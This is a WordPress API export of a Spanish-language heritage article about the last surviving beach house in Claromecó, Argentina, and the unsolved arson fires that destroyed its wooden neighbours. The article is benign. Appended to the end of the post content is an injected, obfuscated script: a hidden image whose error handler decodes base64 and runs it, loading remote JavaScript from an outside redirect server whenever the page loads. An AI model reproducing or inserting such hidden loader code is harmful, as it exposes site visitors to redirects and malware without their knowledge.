{"id":9214,"date":"2025-02-05T09:57:30","date_gmt":"2025-02-05T12:57:30","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9214"},"modified":"2025-08-13T15:32:47","modified_gmt":"2025-08-13T18:32:47","slug":"la-ultima-casa-que-resistio-sobre-la-arena-de-claromeco","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9214","title":{"rendered":"La \u00faltima casa que resisti\u00f3 sobre la arena de Claromec\u00f3"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-1bd7333bd283f34eea5418d097ab61aa\" style=\"background-color:#053e60\"><em>La \u00fanica casa que a\u00fan persiste sobre el mar desafi\u00f3 la sal, el agua, los m\u00e9danos y el fuego en m\u00faltiples atentados an\u00f3nimos que la dejaron solitaria e invadida de an\u00e9cdotas y, a la vez, llena de amor familiar.<\/em><\/h4>\n\n\n\n<p>Claromec\u00f3, la perla costera con los mejores atardeceres de toda la provincia de Buenos Aires, ubicada a 562 kil\u00f3metros de Capital Federal, atesora entre sus dunas una historia de amor familiar, resistencia, misterio y memoria. Sobre la playa, donde el viento y el mar imponen su autoridad, se encuentra la \u00faltima casa que desafi\u00f3 al tiempo. Las otras -aproximadamente 60 -construidas en madera- fueron incendiadas.\u00a0<\/p>\n\n\n\n<p>Su fachada solitaria, desgastada por la sal y el agua y sus cimientos enterrados en la arena, narran una historia que la empodera: la de sobrevivir contra todo pron\u00f3stico.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/casa-playa-toto-flores-35.jpg\"><img decoding=\"async\" width=\"800\" height=\"517\" data-id=\"9219\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/casa-playa-toto-flores-35.jpg\" alt=\"\" class=\"wp-image-9219\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/casa-playa-toto-flores-35.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/casa-playa-toto-flores-35-300x194.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/casa-playa-toto-flores-35-768x496.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/casa-playa-toto-flores-35-696x450.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/casa-playa-toto-flores-35-650x420.jpg 650w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/casa-playa-toto-flores-35-320x207.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/casa-playa-toto-flores-35-480x310.jpg 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-scaled.jpg\"><img decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"9217\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-768x1024.jpg\" alt=\"\" class=\"wp-image-9217\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-768x1024.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-225x300.jpg 225w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-1152x1536.jpg 1152w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-1536x2048.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-696x928.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-1068x1424.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-315x420.jpg 315w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-320x427.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-480x640.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-800x1067.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/IMG_6682-scaled.jpg 1920w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa.jpg\"><img decoding=\"async\" width=\"1024\" height=\"765\" data-id=\"9216\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa.jpg\" alt=\"\" class=\"wp-image-9216\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa-300x224.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa-768x574.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa-80x60.jpg 80w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa-265x198.jpg 265w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa-696x520.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa-562x420.jpg 562w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa-320x239.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa-480x359.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/necochea-tapa-800x598.jpg 800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Construida entre 1935 y 1940, fue la \u00fanica realizada con ladrillos, que acompa\u00f1\u00f3 a la gran cantidad de construcciones de madera que por a\u00f1os poblaron la playa de Claromec\u00f3 y sufrieron, en distintas \u00e9pocas, incendios intencionales. La propiedad pertenece a la familia Florez, pero fue edificada por \u201cGrandes Almacenes El ABC\u201d, un negocio de ramos generales, que a fin de a\u00f1o sorte\u00f3 entre su clientela una casa en el mar y otra en Tres Arroyos -ciudad cabecera del Partido al cual pertenece Claromec\u00f3- El afortunado ganador, quien estaba construyendo su propia casa, decidi\u00f3 venderla y en esa circunstancia ah\u00ed fue que Vitalino Florez, adquiri\u00f3 la que actualmente es la \u00fanica casa privilegiada que sigue abriendo las ventanas frente al mar.<\/p>\n\n\n\n<p>Elevada sobre pilotes que la protegen de la marea, es mucho m\u00e1s que una construcci\u00f3n; es el refugio y la historia familiar de la familia Florez. Pero tambi\u00e9n de las risas de j\u00f3venes que, al amanecer, se refugian debajo de ella y sue\u00f1an con nuevas posibilidades, mientras contemplan los primeros rayos de sol reflejados en el agua.<\/p>\n\n\n\n<p>Con chapas castigadas por la sal y el paso del tiempo, se mantiene firme, custodiando memorias y ofreciendo cobijo a todo aquel que cruza su puerta. Rolando \u201cToto\u201d Florez, actual propietario, y quien la habita la mayor parte del a\u00f1o, la experimenta como un espacio que re\u00fane el pasado y el presente. \u201cVivir mi ni\u00f1ez en este lugar fue incre\u00edble, nos levant\u00e1bamos y nos tir\u00e1bamos de la ventana de la habitaci\u00f3n directamente al m\u00e9dano. Era un espacio de encuentro familiar \u00fanico, mi abuela amasaba los ravioles y nosotros jug\u00e1bamos en el mar\u201d, relata.<\/p>\n\n\n\n<p>Adem\u00e1s de los hermanos Florez, sus propios hijos tambi\u00e9n heredaron el amor por este m\u00e1gico espacio \u201cToda la familia veranea en esta casita, y estamos de acuerdo en preservarla como un lugar de encuentro, como fue siempre\u201d, cuenta orgulloso.<\/p>\n\n\n\n<p>\u00a0A\u00f1orando un tiempo pasado, los ojos azules de Rolando, que parecen heredados del mism\u00edsimo mar, cuentan historias de \u00e9pocas anteriores \u201cMi abuelo ten\u00eda siete hermanos, por lo tanto, hac\u00edamos muy bien las cuentas repartiendo semanas y quincenas para que todos pudieran venir. En los recambios, la familia que llegaba almorzaba con la que se iba. En ese tiempo mi abuelo ven\u00eda y se iba a pescar ac\u00e1 enfrente con redes, y com\u00edamos el pescado en el momento\u201d, comenta con la mirada hacia el mar.<\/p>\n\n\n\n<p>El interior de la casa es un museo viviente. Un cuadro rectangular con tres fotos de distintas \u00e9pocas refleja los cambios y la permanencia; las tablas de surf suspendidas en un rinc\u00f3n, una mesa de madera donde la abuela cocinaba para toda la familia y el aroma marino transportan a la esencia de Claromec\u00f3: libertad, aventura y hogar.<\/p>\n\n\n\n<p>Desde ese balc\u00f3n, la vida parece m\u00e1s amable, m\u00e1s simple, m\u00e1s viva. Visitarla es m\u00e1s que una experiencia visual: es un viaje hacia la historia de Claromec\u00f3 y su eterna conexi\u00f3n con el mar.<\/p>\n\n\n\n<p>Pero esta casa no solo enfrent\u00f3 la fuerza de los m\u00e9danos en constante movimiento, sino tambi\u00e9n las huellas humanas en forma de atentados an\u00f3nimos. El fuego intencional intent\u00f3 consumirla m\u00e1s de una vez, pero cada llama que la envolvi\u00f3 dej\u00f3 cicatrices que hablan de resistencia y sigue firme frente al mar. Sin embargo, sus construcciones inmediatas fueron desapareciendo en cada una de estas fogatas.<\/p>\n\n\n\n<p>\u201cEl fuego nos atac\u00f3 en manos de an\u00f3nimos durante distintas \u00e9pocas, siempre en pleno invierno, cuando las casas estaban desocupadas. El \u00faltimo lo presenci\u00f3 todo el pueblo; las llamas consumieron las casas de Perlita y la de Alberto Dassis, que eran las dos \u00faltimas que quedaban tras los incendios anteriores. La nuestra, al ser la \u00fanica construida con materiales s\u00f3lidos, logr\u00f3 resistir\u201d, relata Rolando.<\/p>\n\n\n\n<p>Marina Villanueva, conocida como Perla, quien tambi\u00e9n tuvo su casa en la arena y fue vecina directa de la familia Florez, recuerda con nostalgia los momentos vividos all\u00ed. \u201cDebajo de la casa pon\u00edamos hamacas y columpios, y sol\u00edamos hacer paellas deliciosas que com\u00edamos a orillas del mar. Mi familia compr\u00f3 nuestra casa en Claromec\u00f3 en 1950. Estaba elevada sobre pilotes, con entrada y salida porque el mar sub\u00eda y pasaba por debajo. Seg\u00fan tengo entendido, estas casas eran de origen holand\u00e9s y en total hab\u00eda unas 56. En mi caso, firm\u00e9 un convenio con la provincia que establec\u00eda que retirar\u00eda la casa si as\u00ed me lo solicitaban. Con esa idea en mente, compr\u00e9 un terreno en la costanera, entre las calles 26 y 28, que a\u00fan conservo. Sin embargo, ya no tengo la casa porque fue destruida en un incendio intencional, cuya autor\u00eda nunca se esclareci\u00f3. Poco a poco, las casas comenzaron a desaparecer, siendo saqueadas o incendiadas. Muchas personas opinaban que afeaban la playa. Un viernes por la noche, prendieron fuego mi casa, pero los bomberos lograron apagarlo. Sin embargo, el lunes siguiente, el fuego comenz\u00f3 desde el otro extremo y quemaron cinco casas juntas. La m\u00eda se salv\u00f3 inicialmente gracias a un m\u00e9dano, pero poco tiempo despu\u00e9s, por 1989 o 1990, la prendieron fuego con combustible, y no qued\u00f3 nada: ni la heladera, ni la mesada de acero inoxidable, ni la estufa a le\u00f1a. Todo se perdi\u00f3 en medio de un silencio c\u00f3mplice. A pesar de todo, sigo viniendo a Claromec\u00f3. Me hice una casa lo m\u00e1s cerca posible del mar, pero lejos del bullicio. Nuestra casa original ten\u00eda 19 camas y siempre estaba llena de gente, como sucede ahora cuando veraneamos en familia. Es parte de nuestra esencia, veraneamos como un cardumen\u00bb, relata Perla con una mezcla de tristeza y cari\u00f1o.<\/p>\n\n\n\n<p>Testigo de innumerables historias, la vivienda de los Florez, se convirti\u00f3 en un s\u00edmbolo para los habitantes y visitantes de Claromec\u00f3, evocando tiempos en que la costa contaba con otras construcciones, las cuales hoy solo sobreviven en la memoria de quienes las habitaron. Sus paredes han sido testigos de an\u00e9cdotas tan variadas como los secretos que guarda el mar que la rodea.<\/p>\n\n\n\n<p>La \u00faltima casa que resisti\u00f3 sobre la arena no es solo un edificio; es un monumento a la lucha contra la adversidad, una postal que invita a reflexionar sobre el paso del tiempo, la relaci\u00f3n con la naturaleza y la importancia de preservar el patrimonio, material e inmaterial, de la costa.<\/p>\n\n\n\n<p>La historia de las casas que desaparecieron en Claromec\u00f3<\/p>\n\n\n\n<p>A principios del siglo XX, Claromec\u00f3 se convirti\u00f3 en un destino popular para turistas, especialmente tresarroyenses y chacareros. En esa \u00e9poca, comenzaron a construirse casas de veraneo de madera sobre pilares, dise\u00f1adas para resistir las crecidas del mar y la inestabilidad del suelo costero.<\/p>\n\n\n\n<p>Sin embargo, desde los a\u00f1os 70 hasta la \u00faltima quema en los 90, alrededor de 57 de estas viviendas desaparecieron. Las razones fueron variadas: abandono por parte de los due\u00f1os, conflictos legales entre el propietario de las tierras, el se\u00f1or Bellocq (propietario de la tierra donde se emplaza la localidad), el gobierno provincial, y la presi\u00f3n de la urbanizaci\u00f3n. Algunos alegaban que estas construcciones \u00abdaban mala imagen\u00bb otros que \u00abobstru\u00edan la vista del mar\u00bb. Adem\u00e1s, las tormentas y los m\u00e9danos contribuyeron a su deterioro y desaparici\u00f3n.<\/p>\n\n\n\n<p>En 1978, solo quedaban unas pocas casas, muchas en estado de abandono. Aunque la Municipalidad de Tres Arroyos propuso un proyecto para recuperarlas y darles un uso cultural y tur\u00edstico, el plan no se concret\u00f3. Finalmente, entre los a\u00f1os 70 y 80, las \u00faltimas edificaciones fueron consumidas por incendios en circunstancias nunca esclarecidas.<\/p>\n\n\n\n<p>Hoy, estas casas son parte de la memoria de Claromec\u00f3. Algunas im\u00e1genes de ellas se conservan en el Museo An\u00edbal Paz, como testigos de una era que ya no existe.<\/p>\n\n\n\n<p>Este destino lleno de sol, mar, magia y familiaridad en las playas m\u00e1s lindas de la Costa Atl\u00e1ntica sigue convocando a miles de turistas que a\u00f1o tras a\u00f1o lo vuelven a elegir sin dudar, como a aquel viejo amor de la adolescencia.<\/p>\n\n\n\n<p>Prensa y Difusi\u00f3n<\/p>\n\n\n\n<p>Cristela Cicar\u00e9 \/Sandra Kan<\/p>\n\n\n\n<p>@cristelacicare @soysandrakan<\/p>\n<p>\u00a0<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La \u00fanica casa que a\u00fan persiste sobre el mar desafi\u00f3 la sal, el agua, los m\u00e9danos y el fuego en m\u00faltiples atentados an\u00f3nimos que la dejaron solitaria e invadida de an\u00e9cdotas y, a la vez, llena de amor familiar. Claromec\u00f3, la perla costera con los mejores atardeceres de toda la provincia de Buenos Aires, ubicada [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9215,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31],"tags":[],"class_list":["post-9214","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboradores"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9214","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9214"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9214\/revisions"}],"predecessor-version":[{"id":9992,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9214\/revisions\/9992"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9215"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9214"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9214"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9214"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}